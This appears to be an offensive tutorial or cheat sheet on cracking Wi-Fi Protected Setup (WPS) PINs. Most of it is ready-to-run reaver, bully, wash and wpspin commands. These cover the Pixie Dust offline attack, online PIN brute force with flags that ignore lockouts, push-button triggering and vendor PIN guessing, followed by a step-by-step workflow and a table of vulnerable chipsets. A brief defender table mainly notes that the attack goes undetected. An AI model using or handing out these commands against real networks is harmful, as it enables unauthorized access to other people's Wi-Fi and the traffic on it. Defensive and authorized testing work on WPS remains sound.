WPS converts an 8-digit PIN into the network PSK via the M3/M4 message exchange. The PIN is split into 4-digit + 3-digit halves (the 8th digit is a checksum), giving only 11,000 effective combinations — and on vulnerable chipsets, the offline Pixie Dust attack recovers the PIN in seconds without ever sending an online attempt.
# wash — dedicated WPS scanner
sudo wash -i wlan0mon
# Or use airodump-ng with WPS column
sudo airodump-ng wlan0mon --wps
Output includes: WPS version (1.0 / 2.0), Locked status, Configured/Unconfigured, vendor.
WPS 2.0 introduced lockout enforcement, but many consumer APs still implement it as "lock for 60 seconds after 3 failures" — easily bypassed by waiting.
The Pixie Dust attack exploits weak nonce generation in WPS-implementing chipsets. The attack captures one full WPS handshake (M1-M4) and then offline-computes the PIN.
# reaver with Pixie Dust mode
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# bully alternative
sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
| Chipset | Vulnerable? |
|---|---|
| Ralink (RT chipsets) | Yes — most older D-Link, TP-Link, Edimax |
| Realtek (RTL8xxx) | Yes — many TRENDnet, Belkin |
| Broadcom (older firmware) | Often yes — specific model + firmware revs |
| MediaTek (specific revs) | Mixed |
| Atheros | Mostly patched |
When successful:
[Pixie-Dust] WPS PIN: 12345670
[Pixie-Dust] WPA PSK: ActualPasswordHere
[Pixie-Dust] AP SSID: HomeWiFi
The PIN gives you the PSK directly via the M7 message — no PSK cracking needed.
When Pixie Dust fails, online brute is the fallback. Send EAPOL-Start → M1 → M2 → M3 attempts with successive PINs.
# reaver online mode (default)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \
-L -N -d 15 -t 30 -T .5 -r 3:30 -vv
# Flags:
# -L : ignore failed lockouts
# -N : don't send NACK packets
# -d 15 : 15-second delay between attempts
# -t 30 : timeout
# -T .5 : timeout for receiving M5/M7
# -r 3:30 : pause 30s every 3 attempts
Most modern APs lock WPS after a few failed PINs. Detect lockout:
Locked flag in beacon switches to Yes
Strategies:
-r accordingly.WPS PBC opens a 120-second window after the user presses the button on the AP. During this window any client requesting WPS is paired without PIN.
Attack viability:
# Trigger PBC pairing attempt
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -P
Some vendors derive the WPS PIN from MAC + serial. With known algorithms:
# wpscalc / WPSPIN — calculate likely PINs from BSSID
wpspin --bssid AA:BB:CC:DD:EE:FF
# Outputs candidate PINs to try first before brute
Hit rate is high on certain Belkin, ZyXEL, and Linksys models.
| Signal | Defender View |
|---|---|
| Reaver/bully traffic pattern | WIPS rule: rapid WPS exchange attempts |
| PIN failures spike | WPS Locked flag flip |
| Vendor PSK leaked offline | Undetectable — Pixie Dust is offline |
| Consumer admin interface | "WPS attempt" might log if AP has audit features (rare) |
Pixie Dust against a vulnerable chipset is essentially undetectable from the wire perspective — only one WPS exchange happens, identical to a legitimate client.
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
# 2. Find WPS APs
sudo wash -i wlan0mon
# 3. Pixie Dust first
sudo reaver -i wlan0mon -b <BSSID> -K 1 -vvv
# 4. If Pixie Dust fails, try vendor-specific PIN candidates
wpspin --bssid <BSSID> | head -10
# 5. Online brute as last resort
sudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vv
# 6. Once PIN known, derive PSK from M7 message
# (reaver does this automatically; bully prints PSK on success)